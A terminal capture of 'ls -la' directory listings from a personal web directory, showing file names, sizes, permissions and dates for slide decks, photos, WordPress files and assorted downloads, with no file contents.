-rw-r--r--    1 effugas  effugas      105868 Nov 26  2002 ref4
-rw-r--r--    1 effugas  effugas      125464 Dec  1  2002 ref5
drwxr-xr-x    2 effugas  effugas         512 Jul 15  2008 reply_here
-rw-r--r--    1 effugas  effugas       36946 Apr 19  2005 sm_tool.py
drwxr-xr-x    5 effugas  effugas         512 Sep 26  2005 sqlite
drwxr-xr-x   11 effugas  effugas        2048 Sep 26  2005 sqlite-2.8.16
-rw-r--r--    1 effugas  effugas      981834 Sep 26  2005 sqlite-2.8.16.tar.gz
drwxr-xr-x    4 effugas  effugas         512 Sep  9  2005 stab-1.3.1
drwxr-xr-x    2 effugas  effugas         512 Feb 11  2003 temp
-rw-r--r--    1 effugas  effugas       61084 Nov 11  2000 test.rle
-rw-r--r--    1 effugas  effugas          17 Mar 27  2006 test.txt
drwxr-xr-x    3 effugas  effugas         512 Jul 13  2005 tmp
drwxr-xr-x    6 effugas  effugas         512 Jan 17  2006 txt2html-2.44
-rw-r--r--    1 effugas  effugas      117583 Jan 17  2006 txt2html-2.44.tar.gz
-rw-r--r--    1 effugas  effugas      137992 Oct 21  2004 up.rle
drwxr-xr-x    4 effugas  effugas         512 Feb 19  2006 uptest
-rw-r--r--    1 effugas  effugas        2072 Dec 20  2004 usage.png
-rw-r--r--    1 effugas  effugas       37255 Dec 20  2004 usage_200412.html
lrwxr-xr-x    1 effugas  effugas          28 Apr 16  2003 van -> albums/2003-Apr14-Vancouver/
-rw-r--r--    1 effugas  effugas          28 Dec 20  2004 webalizer.hist
-rw-r--r--    1 effugas  effugas       33721 Jun  5  2007 why_you_do_this.jpg
-rwx------    1 effugas  effugas      743720 Jul 19  2003 winscp310.exe
-rw-r--r--    1 effugas  effugas       30720 Jan 19  2005 wtf
-rw-r--r--    1 effugas  effugas        4084 Apr 19  2005 wtf.foo
-rw-r--r--    1 effugas  effugas           0 Nov 18  2002 ~.
$ cd doxpara
$ ls -la
total 691032
drwxrwxrwx  124 effugas  effugas      28672 Jul 18 06:22 .
drwxr-xr-x   31 effugas  effugas       2048 Sep 22  2008 ..
-rw-r--r--    1 effugas  effugas      20480 Sep  5  2005 .Frontpage.swm
-rw-r--r--    1 effugas  effugas      20480 Apr 19  2005 .Frontpage.swn
-rw-r--r--    1 effugas  effugas      20480 Apr 19  2005 .Frontpage.swo
-rw-------    1 effugas  effugas      20480 Nov 21  2002 .Frontpage.swp
-rw-------    1 effugas  effugas      12288 Jun 22  2003 .Sidebar.swp
-rw-r--r--    1 effugas  effugas      12288 Dec 24  2005 .hikids.html.swp
-rwxrwxrwx    1 effugas  effugas       1056 Oct 21  2008 .htaccess
-rw-------    1 effugas  effugas      12288 Feb  2  2006 .obvious.html.swp
-rw-r--r--    1 effugas  effugas    5482570 Aug  7  2006 08-07-06_Hackers.mp3
-rw-r--r--    1 effugas  effugas        171 Jan  3  2005 404.php
-rwxr--r--    1 effugas  effugas    1779714 Jan  7  2003 777Bitches.mp3
-rw-r--r--    1 effugas  effugas      36848 Feb 11  2001 Acceptance_camoback.jpg
-rw-r--r--    1 effugas  effugas         78 Nov 14  2002 Addition.html
-rw-r--r--    1 effugas  effugas     192991 Nov 17  2002 Advanced_OpenSSH.pdf
-rw-r--r--    1 effugas  effugas      34691 Feb 11  2001 Anger_camoback.jpg
-rwxr-xr-x    1 effugas  effugas     169984 Mar  5  2003 Applied_Black_Ops_BHW_2003.ppt
-rw-r--r--    1 effugas  effugas        301 Feb 11  2001 Arrow_DownLeft.gif
-rw-r--r--    1 effugas  effugas        299 Feb 11  2001 Arrow_DownRight.gif
-rw-r--r--    1 effugas  effugas        303 Feb 11  2001 Arrow_UpLeft.gif
-rw-r--r--    1 effugas  effugas        305 Feb 11  2001 Arrow_UpRight.gif
-rw-r--r--    1 effugas  effugas     391680 Apr 17  2003 BabelNet-1_11.doc
-rw-r--r--    1 effugas  effugas      36608 Feb 11  2001 Bargaining_camoback.jpg
-rw-r--r--    1 effugas  effugas     803840 Nov 15  2002 Black_Ops_Asia.ppt
-rw-r--r--    1 effugas  effugas     345088 Jul 29  2004 Black_Ops_DNS_BH.ppt
-rw-r--r--    1 effugas  effugas     310272 Nov 15  2002 Black_Ops_DefconX.ppt
-rw-r--r--    1 effugas  effugas    1302528 Nov 18  2002 Black_Ops_Hivercon.ppt
-rw-r--r--    1 effugas  effugas    1275904 Dec 24  2002 Black_Ops_Hivercon_Final.ppt
-rw-r--r--    1 effugas  effugas    8910773 Nov 14  2002 Black_Ops_Of_TCPIP2.pdf
-rw-r--r--    1 effugas  effugas     458752 Aug  1  2005 Black_Ops_Of_TCPIP_2005.ppt
-rw-r--r--    1 effugas  effugas      20255 Aug 14  2005 CHANGELOG.txt
-rw-r--r--    1 effugas  effugas      21038 Feb 11  2001 Caere_General_Privacy_Protection_Fault.gif
-rw-r--r--    1 effugas  effugas      21807 Feb 11  2001 Caere_Illegal_Operation.gif
-rw-r--r--    1 effugas  effugas      36644 Feb 11  2001 Case_Study_camoback.jpg
-rw-r--r--    1 effugas  effugas      36319 Feb 11  2001 Conclusion_camoback.jpg
-rw-r--r--    1 effugas  effugas     176550 Nov  4  2008 CssFilter_1.0.zip
-rwxr-xr-x    1 effugas  effugas    2526208 Aug  3  2007 DMK_BO2K7_Web.ppt
-rwxrwxrwx    1 effugas  effugas    3480064 Aug 15  2008 DMK_BO2K8.ppt
-rwxrwxrwx    1 effugas  effugas    2673664 Feb 20 08:52 DMK_BO2K8_BHFed.ppt
-rwxr-xr-x    1 effugas  effugas    2143744 Jan 20 11:35 DMK_BO2K8_CCC.ppt
lrwxr-xr-x    1 effugas  effugas         17 Feb 20 09:13 DMK_Neut_Toor.ppt -> DMK_Neut_toor.ppt
-rwxrwxrwx    1 effugas  effugas    3241984 Jul 28  2008 DMK_Neut_toor.ppt
-rw-r--r--    1 effugas  effugas    2270768 Dec 25  2004 DSC01568.JPG
-rwxr-xr-x    1 effugas  effugas      53139 Feb 16  2006 DanK_VBFeb06.pdf
-rw-r--r--    1 effugas  effugas      37553 Nov 13  2002 Dan_Kaminsky_Resume.pdf
-rw-r--r--    1 effugas  effugas      10801 Feb 11  2001 Dan_Pic.jpg
-rw-r--r--    1 effugas  effugas      34934 Feb 11  2001 Denial_camoback.jpg
-rw-r--r--    1 effugas  effugas      36755 Feb 11  2001 Depression_camoback.jpg
drwxr-xr-x    4 effugas  effugas        512 Aug 19  2008 Diff
-rw-r--r--    1 effugas  effugas      11028 Apr 18  2008 Diff.php
-rw-r--r--    1 effugas  effugas      29836 Feb 11  2001 DoxSTAR_Logo.jpg
-rw-r--r--    1 effugas  effugas      31977 Feb 11  2001 DoxSTAR_New_Logo.jpg
drwxr-xr-x    2 effugas  effugas        512 Aug 19  2008 Engine
-rw-r--r--    1 effugas  effugas      51619 Sep 23  2005 Frontpage
-rw-r--r--    1 effugas  effugas      40411 Apr 12  2005 Frontpage_backup
-rw-r--r--    1 effugas  effugas      26280 Nov 14  2002 Frontpage_old
-rw-r--r--    1 effugas  effugas      15364 Dec 24  2002 Frontpage_orig
-rw-r--r--    1 effugas  effugas       1016 Nov 14  2002 Frontpage~
-rw-r--r--    1 effugas  effugas       4099 Mar  3  2008 GoogleSpell.php
-rw-r--r--    1 effugas  effugas     959731 Sep 15  2003 IMGP1778.JPG
-rw-r--r--    1 effugas  effugas    1001186 Sep 26  2003 IMGP1807.JPG
-rw-r--r--    1 effugas  effugas     663074 Jul 22  2004 IMGP2357.JPG
-rw-r--r--    1 effugas  effugas     658676 Jul 22  2004 IMGP2358.JPG
-rw-r--r--    1 effugas  effugas     657209 Jul 22  2004 IMGP2360.JPG
-rw-r--r--    1 effugas  effugas      10280 Apr 22  2005 INSTALL.txt
-rw-r--r--    1 effugas  effugas      37027 Feb 11  2001 Introduction_camoback.jpg
-rw-r--r--    1 effugas  effugas      11877 Jan 17  2008 JSON.php
-rw-r--r--    1 effugas  effugas      18019 Sep 15  2004 LICENSE.txt
-rw-r--r--    1 effugas  effugas     237080 Sep 25  2003 Library.array
-rw-r--r--    1 effugas  effugas       5465 Jan 17  2008 Logger.php
-rw-r--r--    1 effugas  effugas       1428 Sep 15  2004 MAINTAINERS.txt
-rw-r--r--    1 effugas  effugas       1125 Mar  2  2008 MIT-LICENSE
-rw-r--r--    1 effugas  effugas       1900 Jan 17  2008 PSpell.php
-rw-r--r--    1 effugas  effugas       2810 Jan 17  2008 PSpellShell.php
-rw-r--r--    1 effugas  effugas    2428600 Nov 14  2002 Publ.2000.5.pdf
-rw-r--r--    1 effugas  effugas   27914818 Nov 14  2002 Publ.2002.3.pdf
drwxr-xr-x    2 effugas  effugas        512 Aug 19  2008 Renderer
-rw-r--r--    1 effugas  effugas       6782 Apr 18  2008 Renderer.php
-rw-r--r--    1 effugas  effugas     253440 Jul 30  2003 SBO.ppt
-rwxr-xr-x    1 effugas  effugas     302592 Oct  1  2003 SBO_Fed.ppt
-rw-r--r--    1 effugas  effugas     461312 Sep 19  2003 SBO_Fed_Prerelease.ppt
-rw-r--r--    1 effugas  effugas     634880 Nov 12  2003 SBO_Hiver.ppt
-rw-r--r--    1 effugas  effugas     175847 Mar 26  2007 SharkReefScaredPic.jpg
-rw-r--r--    1 effugas  effugas     423577 Mar 26  2007 SharkReefVegasPic.jpg
-rw-r--r--    1 effugas  effugas       2305 Jul 13  2005 Sidebar
-rw-r--r--    1 effugas  effugas          0 Dec 29  2004 Sidebar~
-rw-r--r--    1 effugas  effugas      29566 Feb 11  2001 Silc2.jpg
-rw-r--r--    1 effugas  effugas      36390 Feb 11  2001 Sociology_camoback.jpg
-rw-r--r--    1 effugas  effugas       1486 Feb  4  2008 SpellChecker.php
-rwxrwxrwx    1 effugas  effugas     206336 Mar  9 16:45 Staring Into The Abyss.doc
-rwxrwxrwx    1 effugas  effugas     204187 Mar  9 16:45 Staring Into The Abyss.pdf
-rw-r--r--    1 effugas  effugas         79 Nov 14  2002 StringBuf.html
drwxr-xr-x    3 effugas  effugas        512 Jul 15  2008 Text
-rw-r--r--    1 effugas  effugas    2633059 Sep  7  2006 Title_01.txt.png
-rw-r--r--    1 effugas  effugas     951434 Jun 10  2002 Unwind.mov
-rw-r--r--    1 effugas  effugas       2622 Nov 14  2002 ]
-rw-r--r--    1 effugas  effugas      84604 Feb 11  2001 a_DoxSTAR_Logo.jpg
-rw-r--r--    1 effugas  effugas       2943 Jun 27  2008 about.htm
-rw-r--r--    1 effugas  effugas       2059 Feb 25  2008 about.js
drwxr-xr-x    2 effugas  effugas        512 Mar  9 12:26 abyss
-rw-r--r--    1 effugas  effugas      37527 Nov 14  2002 act.html
-rw-r--r--    1 effugas  effugas        157 Jul  1  2001 adddrop.gif
-rw-r--r--    1 effugas  effugas        139 Jul  1  2001 addext.gif
-rw-r--r--    1 effugas  effugas       1184 Jul  1  2001 addfull.gif
-rw-r--r--    1 effugas  effugas        262 Jul  1  2001 addgo.gif
-rw-r--r--    1 effugas  effugas        228 Jul  1  2001 addleft.gif
-rw-r--r--    1 effugas  effugas        216 Jul  1  2001 addlinks.gif
-rw-r--r--    1 effugas  effugas        562 Jul  1  2001 addmidd.gif
-rw-r--r--    1 effugas  effugas        401 Jul  1  2001 addright.gif
-rw-r--r--    1 effugas  effugas         91 Jul  1  2001 addspace.gif
-rw-r--r--    1 effugas  effugas      18030 Jul  8  2008 admin-ajax.php
-rw-r--r--    1 effugas  effugas        571 Feb 29  2008 admin-footer.php
-rw-r--r--    1 effugas  effugas        182 Mar 21  2008 admin-functions.php
-rw-r--r--    1 effugas  effugas       6447 Jul  3  2008 admin-header.php
-rw-r--r--    1 effugas  effugas        432 Jul 11  2008 admin-post.php
-rw-r--r--    1 effugas  effugas        845 Apr 14  2008 admin.php
drwxr-xr-x    5 effugas  effugas        512 Aug 19  2008 advanced
-rw-r--r--    1 effugas  effugas     242613 Feb  2  2004 agenda.pdf
drwxr-xr-x    2 effugas  effugas        512 Aug 19  2008 akismet
-rw-r--r--    1 effugas  effugas       2777 Aug 23  2006 akismet.gif
-rw-r--r--    1 effugas  effugas      33730 Jul  1  2008 akismet.php
-rw-r--r--    1 effugas  effugas        818 Jan 17  2008 alert.gif
-rw-r--r--    1 effugas  effugas        571 Jan  9  2008 align-center.png
-rw-r--r--    1 effugas  effugas        587 Jan  9  2008 align-left.png
-rw-r--r--    1 effugas  effugas        453 Jan  9  2008 align-none.png
-rw-r--r--    1 effugas  effugas        556 Jan  9  2008 align-right.png
-rw-r--r--    1 effugas  effugas       1126 Jun 27  2008 anchor.htm
-rw-r--r--    1 effugas  effugas       1029 Mar 25  2008 anchor.js
drwxr-xr-x    2 effugas  effugas       1536 Sep 14  2003 angel
-rw-r--r--    1 effugas  effugas          0 Apr 26  2005 ani
-rw-r--r--    1 effugas  effugas      91140 Feb 20  2005 ani.jpg
lrwxr-xr-x    1 effugas  effugas          5 Jul 30  2003 apps -> apps2
drwxr-xr-x   25 effugas  effugas        512 Aug 15  2004 apps2
-rw-r--r--    1 effugas  effugas    1561824 Aug 20  2006 ar32_color_partial.png
-rw-r--r--    1 effugas  effugas       2436 Feb 20  2008 archive.php
-rw-r--r--    1 effugas  effugas       3066 Feb 28  2008 archive.png
-rw-r--r--    1 effugas  effugas        352 Nov 18  2006 archives.php
-rw-r--r--    1 effugas  effugas    8502243 Jun 16  2005 arm1.zip
-rwxr-xr-x    1 effugas  effugas      91136 Nov 14  2002 ass10.txt
-rw-r--r--    1 effugas  effugas       1416 Jun 24  2008 async-upload.php
-rw-r--r--    1 effugas  effugas        175 Feb  3  2006 at5.html
-rw-r--r--    1 effugas  effugas      10928 Jun 20  2008 atomlib.php
-rw-r--r--    1 effugas  effugas        430 Dec 24  2005 attack.html
-rw-r--r--    1 effugas  effugas        180 Dec 24  2005 attack2.html
-rw-r--r--    1 effugas  effugas     200604 Mar 24  2003 au8820.o
-rw-r--r--    1 effugas  effugas        146 Jul  3  2008 audio.gif
-rw-r--r--    1 effugas  effugas       4671 Dec 13  2005 audio.jpg
-rw-r--r--    1 effugas  effugas       2647 Feb 28  2008 audio.png
-rw-r--r--    1 effugas  effugas      36130 Apr 24  2007 audiodot.jpg
-rw-r--r--    1 effugas  effugas      14171 Jun 20  2008 author-template.php
drwxr-xr-x    2 effugas  effugas        512 Aug 19  2008 autosave
-rw-r--r--    1 effugas  effugas       8131 Jun 23  2008 autosave.js
-rw-r--r--    1 effugas  effugas       8048 Jan 23  2006 av2.txt
-rwxr-xr-x    1 effugas  effugas      10600 Jan 25  2006 av4.html
-rwx------    1 effugas  effugas      10381 Jan 25  2006 av4.txt
-rw-r--r--    1 effugas  effugas       5661 Jan 22  2006 av_pre.html
-rw-r--r--    1 effugas  effugas       5502 Jan 22  2006 av_pre.txt
-rw-r--r--    1 effugas  effugas      47957 Dec 10  2004 avaya.js
-rw-r--r--    1 effugas  effugas      59756 Sep 23  2001 awpladin.jpg
-rw-r--r--    1 effugas  effugas    9043618 Apr 11  2005 b-ball-e-mail.mov
-rw-r--r--    1 effugas  effugas      20403 Sep 11  2005 b151_alpha.tgz
-rwxrwxrwx    1 effugas  effugas      90306 Feb 11 15:20 badidea.jpg
-rwxrwxrwx    1 effugas  effugas      69977 Feb 11 15:20 badidea.png
drwxr-xr-x    2 effugas  effugas      10240 Dec 21  2006 bait2
-rw-r--r--    1 effugas  effugas      36613 Oct 29  2006 bam.jpg
-rw-r--r--    1 effugas  effugas       1275 May 28  2004 base64.tgz
-rw-r--r--    1 effugas  effugas   14760218 Apr 28  2005 basic_opte.dump
-rw-r--r--    1 effugas  effugas    3512300 Apr 28  2005 basic_opte.zip
-rw-r--r--    1 effugas  effugas      34713 Oct  6  2003 bathroom1.jpg
-rw-r--r--    1 effugas  effugas      30767 Oct  6  2003 bathroom2.jpg
-rw-r--r--    1 effugas  effugas      37078 Oct  6  2003 bathroom3.jpg
-rw-r--r--    1 effugas  effugas      36704 Sep  7  2001 bboym.jpg
-rwxr-xr-x    1 effugas  effugas         64 Feb  2  2006 bgat.html
-rw-r--r--    1 effugas  effugas    2668661 Sep 20  2003 bigtrace_foo.txt.gz
-rw-r--r--    1 effugas  effugas     512200 Sep 20  2003 bigtrace_ordered.txt.gz
-rw-r--r--    1 effugas  effugas       2456 Jan 17  1999 bjt.gif
-rw-r--r--    1 effugas  effugas       3896 Mar 11  2001 bjt.jpg
-rw-r--r--    1 effugas  effugas       7480 Jul  1  2004 black_ops_of_dns.txt
-rw-r--r--    1 effugas  effugas        395 Jan 17  2008 blank.css
-rw-r--r--    1 effugas  effugas         43 May  4  2008 blank.gif
-rw-r--r--    1 effugas  effugas        204 Jan  6  2008 blank.htm
-rw-r--r--    1 effugas  effugas      36963 Apr 16  2008 blogger.php
-rw-r--r--    1 effugas  effugas       6264 Feb 29  2008 blogware.php
-rwxr-xr-x    1 effugas  effugas       3145 Sep  5  2007 blue1.png
-rwxr-xr-x    1 effugas  effugas      15962 Aug 15  2005 blue_double_cross.swf
-rw-r--r--    1 effugas  effugas    1021215 Jun 21  2004 bo2004.pdf
-rw-r--r--    1 effugas  effugas     483840 Jun 13  2004 bo2004.ppt
-rw-r--r--    1 effugas  effugas       4300 Feb 13  2005 boe2.html
-rwxr-xr-x    1 effugas  effugas        810 Feb  5  2005 boeing.html
-rw-r--r--    1 effugas  effugas       7090 Feb  5  2005 boeing.js
-rw-r--r--    1 effugas  effugas       8948 Jun 24  2008 bookmark-template.php
-rw-r--r--    1 effugas  effugas       4818 Apr 15  2008 bookmark.php
-rw-r--r--    1 effugas  effugas        409 Nov 14  2002 bottom.html
-rw-r--r--    1 effugas  effugas        365 Nov 14  2002 bottom_ie.html
-rw-r--r--    1 effugas  effugas    2142026 Dec 17  2006 bouncy.avi
-rw-r--r--    1 effugas  effugas       4398 Aug 27  2005 browse-happy.gif
-rw-r--r--    1 effugas  effugas       3473 Feb 27  2008 btt.php
-rw-r--r--    1 effugas  effugas        395 Mar 22  2008 bubble_bg.gif
-rw-r--r--    1 effugas  effugas       4770 Mar  2  2008 builder.js
-rw-r--r--    1 effugas  effugas        280 Jan 17  2008 button.gif
-rw-r--r--    1 effugas  effugas        989 Jan 31  2008 buttons.gif
-rw-r--r--    1 effugas  effugas       3274 Jan 17  2008 buttons.png
-rwxr-xr-x    1 effugas  effugas        559 Mar 23  2003 bwmon.sh
-rw-r--r--    1 effugas  effugas      11872 May 25  2008 cache.php
-rw-r--r--    1 effugas  effugas     488058 Dec  1  2006 cacm_kaminsky.pdf
-rw-r--r--    1 effugas  effugas         71 Nov 14  2002 cal.html
-rw-r--r--    1 effugas  effugas    1832402 Aug 30  2001 cal_rasterbation.jpg
-rw-r--r--    1 effugas  effugas     129974 Aug 30  2001 cal_rasterbation_small.jpg
-rwxr--r--    1 effugas  effugas    1106567 Jan  1  2003 call.wm_
-rw-r--r--    1 effugas  effugas       9744 May 25  2008 canonical.php
-rw-r--r--    1 effugas  effugas      12732 Apr 16  2008 capabilities.php
-rw-r--r--    1 effugas  effugas     146988 May 15  2007 carpenter.jpg
-rw-r--r--    1 effugas  effugas        556 Oct 31  2007 cat.js
-rw-r--r--    1 effugas  effugas        658 Mar  2  2008 categories.js
-rw-r--r--    1 effugas  effugas       5473 Jun 13  2008 categories.php
-rw-r--r--    1 effugas  effugas      16490 Jul  8  2008 category-template.php
-rw-r--r--    1 effugas  effugas      11341 Jun 15  2008 category.php
-rw-r--r--    1 effugas  effugas      36340 Jun 29  2005 caution.gif
-rw-r--r--    1 effugas  effugas     362496 Sep 30  2005 cc.doc
-rw-r--r--    1 effugas  effugas    2812509 Feb  6  2006 cdcygssh.cab
-rw-r--r--    1 effugas  effugas         25 Feb  6  2006 cdl.html
-rw-r--r--    1 effugas  effugas         41 Jun  1 02:21 cert.htm
-rw-r--r--    1 effugas  effugas          0 Jun  1 02:21 cert.html
-rw-r--r--    1 effugas  effugas     309643 Jan 22  2002 ch12.pdf
-rw-r--r--    1 effugas  effugas     469968 Jan 22  2002 ch13.pdf
-rw-r--r--    1 effugas  effugas       2398 Jun 27  2008 charmap.htm
-rw-r--r--    1 effugas  effugas      14515 Feb 21  2008 charmap.js
-rwxr-xr-x    1 effugas  effugas      95232 Sep  3  2006 chkreg.exe
-rw-r--r--    1 effugas  effugas      28130 Jun 14  2008 class-IXR.php
-rw-r--r--    1 effugas  effugas       5154 Mar 11  2008 class-ftp-pure.php
-rw-r--r--    1 effugas  effugas       8223 Mar 11  2008 class-ftp-sockets.php
-rw-r--r--    1 effugas  effugas      25912 Mar 16  2008 class-ftp.php
-rw-r--r--    1 effugas  effugas     243102 Mar 15  2008 class-pclzip.php
-rw-r--r--    1 effugas  effugas       6807 Jun 14  2008 class-phpass.php
-rw-r--r--    1 effugas  effugas      44998 Jun 14  2008 class-phpmailer.php
-rw-r--r--    1 effugas  effugas      20667 Jun 14  2008 class-pop3.php
-rw-r--r--    1 effugas  effugas      33419 Jun 24  2008 class-smtp.php
-rw-r--r--    1 effugas  effugas      37889 Jun 14  2008 class-snoopy.php
-rw-r--r--    1 effugas  effugas       5307 Jul  3  2008 class-wp-filesystem-base.php
-rw-r--r--    1 effugas  effugas       6558 May 30  2008 class-wp-filesystem-direct.php
-rw-r--r--    1 effugas  effugas      10411 May 29  2008 class-wp-filesystem-ftpext.php
-rw-r--r--    1 effugas  effugas       7820 May 30  2008 class-wp-filesystem-ftpsockets.php
-rw-r--r--    1 effugas  effugas       5480 May 20  2008 class.wp-dependencies.php
-rw-r--r--    1 effugas  effugas       2673 Jul  9  2008 class.wp-scripts.php
-rw-r--r--    1 effugas  effugas       2369 Jul  9  2008 class.wp-styles.php
drwxr-xr-x    3 effugas  effugas        512 Aug 19  2008 classes
-rw-r--r--    1 effugas  effugas      24824 Jul  6  2008 classes.php
drwxr-xr-x    2 effugas  effugas        512 Jul 15  2008 classic
-rw-r--r--    1 effugas  effugas       4082 Oct 26  2004 classy.cpp
-rw-r--r--    1 effugas  effugas        151 Feb 11  2001 clearbar.gif
drwxr-xr-x    3 effugas  effugas        512 Aug 19  2008 clearlooks2
-rw-r--r--    1 effugas  effugas         43 Feb 11  2001 clearpixel.gif
-rw-r--r--    1 effugas  effugas      69121 Sep 23  2002 cleartype.jpg
-rw-r--r--    1 effugas  effugas      37749 Nov 14  2002 cleartype.png
-rw-r--r--    1 effugas  effugas     289792 Apr 16  2006 cmd.exe
-rw-r--r--    1 effugas  effugas       4107 Jul 20  2004 cnet.xml
drwxrwxrwx    2 effugas  effugas        512 Oct 17  2005 code
-rw-r--r--    1 effugas  effugas       2133 Feb 28  2008 code.png
drwxr-xr-x    2 effugas  effugas        512 Dec 19  2002 collab
drwx------    2 effugas  effugas       1024 Jul 15  2003 collection
-rw-r--r--    1 effugas  effugas       2875 Jun 27  2008 color_picker.htm
-rw-r--r--    1 effugas  effugas      11017 Jun  4  2008 color_picker.js
-rwxr-xr-x    1 effugas  effugas        907 Sep  5  2007 colorcode.css
-rw-r--r--    1 effugas  effugas       3189 Jan 17  2008 colorpicker.jpg
-rw-r--r--    1 effugas  effugas      29114 Feb 29  2008 colorpicker.js
-rw-r--r--    1 effugas  effugas        116 Mar 22  2008 colors-classic-rtl.css
-rw-r--r--    1 effugas  effugas      14048 Jul 10  2008 colors-classic.css
-rw-r--r--    1 effugas  effugas        116 Mar 19  2008 colors-fresh-rtl.css
-rw-r--r--    1 effugas  effugas      13843 Jul 10  2008 colors-fresh.css
-rw-r--r--    1 effugas  effugas        158 Feb 10  2008 comment-grey-bubble.png
-rw-r--r--    1 effugas  effugas         72 Dec 22  2007 comment-pill.gif
-rw-r--r--    1 effugas  effugas       1100 Mar 11  2008 comment-stalk-classic.gif
-rw-r--r--    1 effugas  effugas       1067 Mar 11  2008 comment-stalk-fresh.gif
-rw-r--r--    1 effugas  effugas       1064 Mar 19  2008 comment-stalk-rtl.gif
-rw-r--r--    1 effugas  effugas      23887 Jun 22  2008 comment-template.php
-rw-r--r--    1 effugas  effugas        897 Mar 26  2008 comment.js
-rw-r--r--    1 effugas  effugas       3384 Apr 22  2008 comment.php
-rw-r--r--    1 effugas  effugas       5062 Mar 21  2008 comments-popup.php
-rw-r--r--    1 effugas  effugas       3495 Mar 17  2008 comments.php
-rw-r--r--    1 effugas  effugas       1286 Mar 18  2008 common.js
-rw-r--r--    1 effugas  effugas       2693 Mar  3  2008 compat.php
-rw-r--r--    1 effugas  effugas        637 Jan 17  2008 config.php
-rw-r--r--    1 effugas  effugas        915 Jan 17  2008 confirm.gif
-rwxr-xr-x    1 effugas  effugas       4940 Sep 23  2005 confoo.pl
-rw-r--r--    1 effugas  effugas        314 Jan 31  2008 content.css
-rw-r--r--    1 effugas  effugas      34927 Mar  2  2008 controls.js
-rw-r--r--    1 effugas  effugas       9215 Jul 22  2001 cornell.jpg
-rw-r--r--    1 effugas  effugas        911 Jan 17  2008 corners.gif
-rw-r--r--    1 effugas  effugas     161371 Sep 22  2003 county2.sql
-rw-r--r--    1 effugas  effugas       7119 Aug 23  2005 cred.zip
-rw-r--r--    1 effugas  effugas       3097 Nov 14  2002 crit.txt
-rw-r--r--    1 effugas  effugas       5099 Aug 29  2007 cron.php
drwxr-xr-x    2 effugas  effugas        512 Jul 15  2008 crop
-rw-r--r--    1 effugas  effugas       2950 Mar  2  2008 cropper.css
-rw-r--r--    1 effugas  effugas      16485 May  4  2007 cropper.js
drwxr-xr-x    2 effugas  effugas        512 Jul 15  2008 crystal
drwxr-xr-x    2 effugas  effugas       1024 Jul 15  2008 css
-rw-r--r--    1 effugas  effugas        533 Feb 21  2008 css.png
-rw-r--r--    1 effugas  effugas        968 Mar  2  2008 custom-fields.js
-rw-r--r--    1 effugas  effugas      11684 May 27  2008 custom-header.php
-rw-r--r--    1 effugas  effugas      25846 Feb 11  2001 dan1.jpg
-rw-r--r--    1 effugas  effugas      30054 Feb 11  2001 dan2.jpg
-rw-r--r--    1 effugas  effugas      59055 Sep 15  2003 dan_and_sally.jpg
-rw-r--r--    1 effugas  effugas     723975 Jun 28  2004 dan_at_l1.jpg
-rw-r--r--    1 effugas  effugas     842526 Jun 28  2004 dan_at_l1_2.jpg
-rw-r--r--    1 effugas  effugas      37749 Aug 10  2003 dan_sarah.jpg
-rwxrwxrwx    1 effugas  effugas      39961 Jul 19  2008 danjaybeale.png
-rw-r--r--    1 effugas  effugas       1435 Jul 13  2008 dashboard-rtl.css
-rw-r--r--    1 effugas  effugas       4793 Mar 21  2008 dashboard.css
-rw-r--r--    1 effugas  effugas      22311 Jun 20  2008 dashboard.php
drwxr-sr-x    2 effugas  effugas        512 Oct 17  2005 database
-rw-r--r--    1 effugas  effugas        111 Mar 14  2008 date-button.gif
-rwxr-xr-x    1 effugas  effugas       2420 Nov 14  2002 david.txt
-rw-r--r--    1 effugas  effugas    2105488 Jan 29  2007 ddop-0.1.zip
-rw-r--r--    1 effugas  effugas    2105664 Jan 31  2007 ddop-0.2.zip
-rw-r--r--    1 effugas  effugas    2105999 Feb  3  2007 ddop-0.3.zip
drwxr-xr-x    3 effugas  effugas        512 Jul 15  2008 default
-rw-r--r--    1 effugas  effugas       6896 Jun 29  2008 default-filters.php
-rw-r--r--    1 effugas  effugas        479 Feb 21  2008 default.png
-rw-r--r--    1 effugas  effugas       1638 Jun  9  2008 delete.png
-rwxr-xr-x    1 effugas  effugas     751304 Mar 26  2003 demo9.exe
-rw-r--r--    1 effugas  effugas      37548 Jul  8  2008 deprecated.php
drwxr-xr-x    2 effugas  effugas        512 Aug  7  2003 dev
-rw-r--r--    1 effugas  effugas       5421 Feb 21  2008 dialog.css
-rw-r--r--    1 effugas  effugas     422438 Jan 26  2006 diff.html
-rw-r--r--    1 effugas  effugas     408043 May 15 11:32 diffiegrandma.jpg
-rwx------    1 effugas  effugas        140 Jan 22  2007 direct.html
drwxr-xr-x    2 effugas  effugas        512 Aug 19  2008 directionality
-rw-r--r--    1 effugas  effugas     534851 Jan 16  2006 dll_func0.PNG
-rw-r--r--    1 effugas  effugas      20140 Oct 22  2001 dmk.jpg
-rwxr-xr-x    1 effugas  effugas     263415 Oct  3  2001 dmk1_full.jpg
-rwxr-xr-x    1 effugas  effugas     346549 Oct  3  2001 dmk2_full.jpg
-rw-r--r--    1 effugas  effugas   13224448 Jun 27  2007 dmk_audioviz.ppt
-rw-r--r--    1 effugas  effugas   11904275 Aug  9  2006 dmk_bbc_raul.mp3
-rw-r--r--    1 effugas  effugas    9568256 Aug  3  2006 dmk_blackops2006.ppt
-rw-r--r--    1 effugas  effugas    8652746 Nov 28  2006 dmk_bo2006_toor.pdf
-rw-r--r--    1 effugas  effugas    7104740 Aug  8  2006 dmk_bo2k6.pdf
-rw-r--r--    1 effugas  effugas   10059264 Apr 28  2007 dmk_shmoo2007.ppt
-rw-r--r--    1 effugas  effugas      94945 Aug 10  2004 dn_atmouse.jpg
-rw-r--r--    1 effugas  effugas     140292 Aug 10  2004 dn_atpier.jpg
drwxr-xr-x    2 effugas  effugas        512 Dec 20  2004 dna
drwxrwxrwx    3 effugas  effugas        512 Jun 21  2004 dns
-rw-r--r--    1 effugas  effugas     106496 Jun 29  2004 dns.log
drwxr-xr-x    4 effugas  effugas        512 Aug  1  2004 dns_bh
-rw-r--r--    1 effugas  effugas     507548 Nov  7  2004 dns_coords.zip
drwxr-xr-x    2 effugas  effugas        512 Sep 16  2004 dns_fast
-rw-r--r--    1 effugas  effugas      82026 Jun 29  2004 dns_scan_1.jpg
-rw-r--r--    1 effugas  effugas      74457 Jun 29  2004 dns_scan_2.jpg
drwxr-xr-x    3 effugas  effugas        512 Sep 30  2004 dns_tc
-rw-r--r--    1 effugas  effugas    1116160 Jun 21  2004 dnsstuff.tar
-rw-r--r--    1 effugas  effugas       1535 Feb 21  2008 doc.png
